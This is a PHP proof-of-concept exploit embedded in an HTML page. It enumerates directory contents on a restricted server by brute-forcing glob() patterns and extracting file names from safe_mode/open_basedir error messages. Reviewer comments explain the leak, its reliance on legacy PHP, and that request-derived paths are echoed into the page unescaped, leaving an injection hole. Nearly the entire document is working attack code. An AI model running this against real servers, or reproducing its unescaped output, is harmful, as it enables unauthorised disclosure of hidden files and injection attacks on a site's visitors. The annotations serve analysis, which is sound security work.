<!DOCTYPE HTML public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=windows-1250">
 <title>exploit - glob()</title>
</head>
<body>
<?php
/* written by Emkei */
/*
 * Directory-listing proof of concept built on an error-message side channel.
 *
 * For the directory named by the `path` query parameter, the script calls
 * glob() with short wildcard patterns and ignores glob()'s return value.
 * Instead it recovers a file name from the text of the last error message
 * ($php_errormsg). The names collected this way are printed as links.
 *
 * Reviewer notes (defensive):
 *  - The leak is the file path embedded in the restriction error text. The
 *    matched phrase "owned by uid" resembles PHP's safe_mode uid-check
 *    warning, although the inline comments attribute the error to
 *    open_basedir. TODO confirm against the PHP build in question.
 *  - The script depends on legacy interpreter features: $php_errormsg is only
 *    populated when track_errors is enabled and was removed in PHP 8.0,
 *    eregi() was removed in PHP 7.0, and safe_mode itself was removed in
 *    PHP 5.4.0. It does not run as written on current PHP.
 *  - Request-derived and filesystem-derived strings are written into the HTML
 *    response without escaping (see both echo statements below).
 */
// Takes the 'path' query parameter and canonicalises it; realpath() returns
// false when the path cannot be resolved, which selects the default below.
$path = realpath($_GET['path']); // reads GET variable $path from URL
if (!$path) $path = '/'; // default path

// Normalise to exactly one trailing slash so patterns can be appended directly.
if (substr($path,-1,1)!='/') $path .= '/';
// NOTE(review): $path originates from the request and is echoed unescaped;
// a viewer-facing page would pass it through htmlspecialchars().
echo '<b>',$path=='/'?'/':substr($path,0,strlen($path)-1),"</b><br>\n"; // absolute path in the top

// chars used in filename, the first one must be empty
// (the empty entry makes the shortest pattern just "<prefix>*"; names that
// use characters outside this list cannot be matched character by character)
$foo = array('','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9','+','-',' ',',','.','_',';','!','(',')','=','%','&','$','#','@','~');

// Prephase: one glob() per candidate character, to learn which first
// characters occur in the directory. This shrinks the innermost loop below.
foreach ($foo as $y) { // prephase speeds up the script via selection
 $param = $path.$y.'*';
 // '@' keeps the warning out of the response; the message text is still read
 // back from $php_errormsg on the next line.
 @glob($param); // glob(), result is an error message (because of open_basedir)
 // NOTE(review): the eregi() return value is not checked, so on a non-match
 // $regs presumably keeps its previous contents (or is unset on the first
 // pass) and a stale or empty name is recorded. TODO confirm.
 eregi('(/.*owned by uid)', $php_errormsg, $regs); // reads filename from the last error message
 // 13 == strlen(' owned by uid'): strip that suffix, keep the base name,
 // then keep only its first character.
 $bar[] = substr(basename(substr($regs[0],0,strlen($regs[0])-13)),0,1);
}
$bar = array_unique($bar);

// Main enumeration: every prefix of up to three characters ($i from the
// prephase result, $j and $k from the full list, each of which may be empty).
// The number of glob() calls is count($bar) * count($foo)^2 per request.
foreach ($foo as $k) { // third phase
 foreach ($foo as $j) { // second phase
  foreach ($bar as $i) { // first phase (result of the prephase)
   $char = $i.$j.$k;
   $param = $path.$char.'*';
   @glob($param); // glob(), result is an error message (because of open_basedir)
   // Same extraction as the prephase, but the whole base name is kept.
   eregi('(/.*owned by uid)', $php_errormsg, $regs); // reads filename from the last error message
   $files[] = basename(substr($regs[0],0,strlen($regs[0])-13));
  }
 }
}

// De-duplicate and print each recovered name as a link that re-invokes
// glob2.php (presumably this script's own file name) with the entry as 'path'.
sort($files);
// NOTE(review): $path and $dump are placed in the href and title attributes
// with neither URL-encoding nor HTML-escaping. The candidate list includes
// '&', '#' and '%', so such names produce a wrong query string, and a name
// containing quotes or angle brackets would break the markup.
foreach (array_unique($files) as $dump) { // output
 echo '<a href="glob2.php?path=',$path,$dump,'" title="',$path,$dump,'">',$dump,"</a><br>\n";
}
?>
</body>
</html>